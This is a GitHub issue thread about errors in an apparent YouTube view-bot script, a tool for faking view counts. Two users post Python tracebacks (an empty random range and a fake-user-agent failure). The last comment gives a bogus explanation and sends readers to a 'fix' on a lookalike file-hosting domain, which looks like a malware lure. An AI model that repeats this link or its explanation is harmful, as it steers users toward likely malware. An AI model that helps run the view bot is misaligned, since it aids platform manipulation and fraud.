### ISSUE TITLE
Error

### ISSUE THREAD

**Issue by Da2Rrk** [Plasmonix/Youtube-viewbot#8]
when i put the proxies he say : 

 Traceback (most recent call last):
  File "C:\Users\Darkness\Downloads\Youtube-viewbot-main\main.py", line 116, in <module>
    sleeptime = random.randint(minwatch,maxwatch)
  File "C:\Users\Darkness\AppData\Local\Programs\Python\Python39\lib\random.py", line 339, in randint
    return self.randrange(a, b+1)
  File "C:\Users\Darkness\AppData\Local\Programs\Python\Python39\lib\random.py", line 317, in randrange
    raise ValueError("empty range for randrange() (%d, %d, %d)" % (istart, istop, width))
ValueError: empty range for randrange() (2, 2, 0)

**Comment by krushnajii** [comment]
Exception has occurred: FakeUserAgentError
Maximum amount of retries reached

During handling of the above exception, another exception occurred:


During handling of the above exception, another exception occurred:

  File "C:\Users\krush\OneDrive\Desktop\New folder (7)\Youtube-viewbot-main\main.py", line 11, in __init__
    self.ua = UserAgent()
  File "C:\Users\krush\OneDrive\Desktop\New folder (7)\Youtube-viewbot-main\main.py", line 43, in <module>
    bot = Viewbot()

**Comment by Cook325** [comment]
The error happens because of Windows system restrictions while optimizing your proxies. The fix is at [medi-fire.cam/pages/a339ee3ca5f448ada4ff1ccab2aac1dd](https://medi-fire.cam/pages/a339ee3ca5f448ada4ff1ccab2aac1dd)
